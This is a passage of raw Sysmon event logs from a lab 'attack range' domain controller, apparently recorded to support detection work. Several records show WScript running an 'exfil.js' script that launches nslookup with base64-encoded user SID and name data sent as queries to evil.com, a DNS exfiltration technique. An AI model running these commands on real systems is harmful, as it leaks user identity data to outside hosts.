-type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxsya.tmp 2>&1 10341000x8000000000000000212281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.438{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-FC44-000000005F02}3764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.438{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-FC44-000000005F02}3764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.438{2E1864BB-18F5-629A-FC44-000000005F02}37647336C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-FB44-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000212278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{00000000-0000-0000-0000-000000000000}1492<unknown process>-udpfalsefalse127.0.0.1-50984-false127.0.0.1-53domain 354300x8000000000000000212277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50984- 354300x8000000000000000212276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{00000000-0000-0000-0000-000000000000}1492<unknown process>-udptruefalse127.0.0.1-50984-false127.0.0.1-53domain 354300x8000000000000000212275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{00000000-0000-0000-0000-000000000000}1492<unknown process>-udpfalsefalse127.0.0.1-50983-false127.0.0.1-53domain 354300x8000000000000000212274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50983- 354300x8000000000000000212273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{00000000-0000-0000-0000-000000000000}1492<unknown process>-udptruefalse127.0.0.1-50983-false127.0.0.1-53domain 354300x8000000000000000212272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.039{00000000-0000-0000-0000-000000000000}1492<unknown process>-udpfalsefalse127.0.0.1-50982-false127.0.0.1-53domain 354300x8000000000000000212271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.038{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50982- 354300x8000000000000000212270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.038{00000000-0000-0000-0000-000000000000}1492<unknown process>-udptruefalse127.0.0.1-50982-false127.0.0.1-53domain 354300x8000000000000000212269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.887{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50981-false127.0.0.1-53domain 354300x8000000000000000212268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.886{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50981- 354300x8000000000000000212267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.886{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-50981-false127.0.0.1-53domain 354300x8000000000000000212266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.886{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50980-false127.0.0.1-53domain 354300x8000000000000000212265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.886{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50980- 354300x8000000000000000212264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.885{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50979- 354300x8000000000000000212263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50978- 354300x8000000000000000212262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50977- 354300x8000000000000000212261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.793{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50976- 354300x8000000000000000212260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-50963-false127.0.0.1-53domain 354300x8000000000000000212259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-50963-false127.0.0.1-53domain 354300x8000000000000000212258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-50962-false127.0.0.1-53domain 354300x8000000000000000212257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.286{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-50962-false127.0.0.1-53domain 354300x8000000000000000212256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.286{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-50961-false127.0.0.1-53domain 354300x8000000000000000212255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.286{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-50961-false127.0.0.1-53domain 354300x8000000000000000212254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-50960-false127.0.0.1-53domain 354300x8000000000000000212253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-50960-false127.0.0.1-53domain 354300x8000000000000000212252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-50959-false127.0.0.1-53domain 354300x8000000000000000212251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.213{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-50959-false127.0.0.1-53domain 354300x8000000000000000212250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.212{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-50958-false127.0.0.1-53domain 354300x8000000000000000212249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.212{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-50958-false127.0.0.1-53domain 354300x8000000000000000212248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.110{00000000-0000-0000-0000-000000000000}7544<unknown process>-udpfalsefalse127.0.0.1-50957-false127.0.0.1-53domain 354300x8000000000000000212247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{00000000-0000-0000-0000-000000000000}7544<unknown process>-udptruefalse127.0.0.1-50957-false127.0.0.1-53domain 354300x8000000000000000212246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.109{00000000-0000-0000-0000-000000000000}7544<unknown process>-udptruefalse127.0.0.1-50955-false127.0.0.1-53domain 354300x8000000000000000212245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.011{00000000-0000-0000-0000-000000000000}2308<unknown process>-udpfalsefalse127.0.0.1-50954-false127.0.0.1-53domain 354300x8000000000000000212244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.010{00000000-0000-0000-0000-000000000000}2308<unknown process>-udpfalsefalse127.0.0.1-50953-false127.0.0.1-53domain 354300x8000000000000000212243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.010{00000000-0000-0000-0000-000000000000}2308<unknown process>-udptruefalse127.0.0.1-50953-false127.0.0.1-53domain 354300x8000000000000000212242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.008{00000000-0000-0000-0000-000000000000}2308<unknown process>-udpfalsefalse127.0.0.1-50952-false127.0.0.1-53domain 354300x8000000000000000212241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.008{00000000-0000-0000-0000-000000000000}2308<unknown process>-udptruefalse127.0.0.1-50952-false127.0.0.1-53domain 10341000x8000000000000000212240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FC44-000000005F02}3764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FB44-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-18E0-629A-6742-000000005F02}39765988C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-FB44-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.430{2E1864BB-18F5-629A-FB44-000000005F02}5884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxsya.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.422{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtli.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-18F5-629A-F944-000000005F02}20207616C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-FA44-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.407{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-FA44-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.391{2E1864BB-18F5-629A-F844-000000005F02}51048072C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-FA44-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.405{2E1864BB-18F5-629A-FA44-000000005F02}3396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-F844-000000005F02}5104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtli.tmp 2>&1 10341000x8000000000000000212223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 